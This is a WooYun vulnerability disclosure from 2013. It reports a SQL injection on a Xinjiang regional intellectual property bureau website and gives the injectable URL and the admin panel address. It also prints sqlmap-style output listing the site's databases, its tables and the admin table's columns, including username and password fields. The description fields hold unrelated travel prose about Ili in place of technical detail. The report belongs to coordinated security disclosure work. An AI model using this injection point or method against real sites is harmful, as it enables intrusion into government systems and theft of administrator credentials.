当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043933

漏洞标题:新疆维吾尔自治区知识产权局sql注射可进后台

相关厂商:新疆维吾尔自治区知识产权局

漏洞作者: 雅柏菲卡

提交时间:2013-11-28 16:53

修复时间:2014-01-12 16:53

公开时间:2014-01-12 16:53

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-11-28: 细节已通知厂商并且等待厂商处理中
2013-12-01: 厂商已经确认,细节仅向厂商公开
2013-12-11: 细节向核心白帽子及相关领域专家公开
2013-12-21: 细节向普通白帽子公开
2013-12-31: 细节向实习白帽子公开
2014-01-12: 细节向公众公开

简要描述:

牧歌滑过高高的斜坡 
滑过胡杨林  
夹杂着果子的芬芳  
在辽阔的草原上回荡  
我们的心 装满了美丽的喜悦

详细说明:

位于西北边陲的伊犁,素有“塞外江南”之美称。伊犁是中亚腹地一个温馨的绿岛,是遥远西陲一方天赐的宝地,是千里塞外一片杏花开放的江南……临近异国的伊犁,弥漫着浓浓的异域风情。伊犁地区为天山各支脉所环绕分隔,其独特的地理环境,派生出一系列各具特色、奇异的自然景观。伊犁美,美在气候宜人,风景秀丽,资源雄厚,物产富娆;伊犁美,美在民族风情特色浓、色彩斑斓的民族情;伊犁美,美还美在历史久远源头长,观光旅游景点多......
香飘十里的果子沟,山路十八盘,层林迭嶂,瀑布泉涌,山花烂漫,果木成林,被称为“奇绝仙境”,一日可见四季景观,步步可见不同景色;碧波荡漾的赛里木湖,蓝蓝的湖水,蓝蓝的天,雪山环抱,白云千载空悠悠。湖岸每年定居着一些水禽飞鸟,有“世外灵壤”之称;一望无际的那拉提草原,河谷平展,森林繁茂,自古以来就是注明的牧场;悠悠西去的伊犁河,象一个温柔的母亲,无言地滋养着这片美丽的土地。
河岸是一片青青的白杨林,展现着《草原之夜》的迷人意境。少有这样鲜亮的蓝天碧野; 少见高山下的万顷良田!在这里,雪山长河落日映衬小桥流水人家;在这里,牛羊毡房牧场与现代城镇迭合在同一个画面……伊犁之美,实在是美不胜收。除了领略自然风光,到了伊犁,你还可以去看看维吾尔农家用蓝马车迎新娘,尝尝香喷喷的手抓饭和鲜嫩的烤羊肉,骑上俊马在草原上奔驰,尽情欣赏牧场风光。还可以到哈萨克毡房去做客,听热情的哈萨克老人讲那些年代久远的故事……

漏洞证明:

http://www.xjipo.gov.cn/Counter/Counter.aspx?CounterID=1 注入点
available databases [9]:
[*] dcbase
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] xjwwezscqj
[*] xjzscqj
Database: xjzscqj
[102 tables]
+------------------------------+
| dbo.LabelTree                |
| dbo.PE_Special               |
| dbo.TM_ActureStep            |
| dbo.TM_AdZone                |
| dbo.TM_Admin                 |
| dbo.TM_Advertisement         |
| dbo.TM_Analysis              |
| dbo.TM_Announce              |
| dbo.TM_AreaCollection        |
| dbo.TM_Article               |
| dbo.TM_Author                |
| dbo.TM_Catalog               |
| dbo.TM_Channel               |
| dbo.TM_City                  |
| dbo.TM_Class                 |
| dbo.TM_Comment               |
| dbo.TM_Company               |
| dbo.TM_ComplainItem          |
| dbo.TM_Config                |
| dbo.TM_CopyFrom              |
| dbo.TM_Counter               |
| dbo.TM_Country               |
| dbo.TM_Department            |
| dbo.TM_Dictionary            |
| dbo.TM_Field                 |
| dbo.TM_Filters               |
| dbo.TM_FlowDefine            |
| dbo.TM_FlowStep              |
| dbo.TM_FlowType              |
| dbo.TM_Friend                |
| dbo.TM_FriendSite            |
| dbo.TM_FsKind                |
| dbo.TM_Funcs                 |
| dbo.TM_GovAreaCode           |
| dbo.TM_GovInfo               |
| dbo.TM_GovService            |
| dbo.TM_GuestBook             |
| dbo.TM_GuestKind             |
| dbo.TM_HistrolyNews          |
| dbo.TM_InfoS                 |
| dbo.TM_InfoSend              |
| dbo.TM_Interview             |
| dbo.TM_InterviewQuestionType |
| dbo.TM_InterviewQuestions    |
| dbo.TM_InterviewUser         |
| dbo.TM_InvoiceItem           |
| dbo.TM_Item                  |
| dbo.TM_ItemLog               |
| dbo.TM_JobCategory           |
| dbo.TM_JsFile                |
| dbo.TM_KeyLink               |
| dbo.TM_KeywordType           |
| dbo.TM_Keywords              |
| dbo.TM_Label                 |
| dbo.TM_LabelElement          |
| dbo.TM_LabelInfo             |
| dbo.TM_Log                   |
| dbo.TM_ManageTables          |
| dbo.TM_Message               |
| dbo.TM_NetGuard              |
| dbo.TM_Photo                 |
| dbo.TM_PigeonholeActureStep  |
| dbo.TM_PigeonholeFields      |
| dbo.TM_PigeonholeWorkFlow    |
| dbo.TM_SelfLabel             |
| dbo.TM_Skin                  |
| dbo.TM_Special               |
| dbo.TM_Survey                |
| dbo.TM_SurveyOptions         |
| dbo.TM_SurveyTopic           |
| dbo.TM_TablesContent         |
| dbo.TM_TablesFields          |
| dbo.TM_Template              |
| dbo.TM_TemplateInfo          |
| dbo.TM_TemplateProject       |
| dbo.TM_TemplateSort          |
| dbo.TM_TitlePic              |
| dbo.TM_UsedDetail            |
| dbo.TM_User                  |
| dbo.TM_User111               |
| dbo.TM_UserGroup             |
| dbo.TM_Vote                  |
| dbo.TM_WebSite               |
| dbo.TM_WorkFlow              |
| dbo.TM_WorkFlowState         |
| dbo.TM_WorkPlace             |
| dbo.V_CommentTitle           |
| dbo.V_CommnetPassed          |
| dbo.ViewTM_FinishWork        |
| dbo.ViewTM_User              |
| dbo.ViewTM_Work              |
| dbo.dtproperties             |
| dbo.sysconstraints           |
| dbo.syssegments              |
| dbo.tabArticleClass          |
| dbo.test11                   |
| dbo.test_Class               |
| dbo.vieArticle               |
| dbo.vieGovInfo               |
| dbo.vieInfoSend              |
| dbo.viewTM_gov               |
| zym.DIY_TEMPCOMMAND_TABLE    |
+------------------------------+
Database: xjzscqj
Table: dbo.TM_Admin
[41 columns]
+------------------------+------+
| Column                 | Type |
+------------------------+------+
| AdminName              | bit  |
| AdminPurview_Article   | bit  |
| AdminPurview_economy   | bit  |
| AdminPurview_GuestBook | bit  |
| AdminPurview_House     | bit  |
| AdminPurview_Job       | bit  |
| AdminPurview_Others    | bit  |
| AdminPurview_Photo     | bit  |
| AdminPurview_Shop      | bit  |
| AdminPurview_Soft      | bit  |
| AdminPurview_Supply    | bit  |
| AreaCode               | bit  |
| AreaID                 | bit  |
| AreaName               | bit  |
| arrClass_Check         | bit  |
| arrClass_GuestBook     | bit  |
| arrClass_House         | bit  |
| arrClass_Input         | bit  |
| arrClass_Manage        | bit  |
| arrClass_View          | bit  |
| Count_Add              | bit  |
| Count_Check            | bit  |
| Count_Reject           | bit  |
| DepartCode             | bit  |
| DepartID               | bit  |
| DepartName             | bit  |
| EnableMultiLogin       | bit  |
| ID                     | int  |
| LastLoginIP            | int  |
| LastLoginTime          | int  |
| LastLogoutTime         | int  |
| LinkEmail              | int  |
| LinkMobile             | int  |
| LinkTel                | int  |
| LoginTimes             | int  |
| Password               | int  |
| Purview                | int  |
| RndPassword            | int  |
| RoleName               | int  |
| UserName               | int  |
| WebSiteID              | int  |
+------------------------+------+
QQ截图20131124191123.jpg




http://www.xjipo.gov.cn/admin/ 后台地址



QQ截图20131124191239.jpg

修复方案:

版权声明:转载请注明来源 雅柏菲卡@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2013-12-01 22:38

厂商回复:

最新状态:

暂无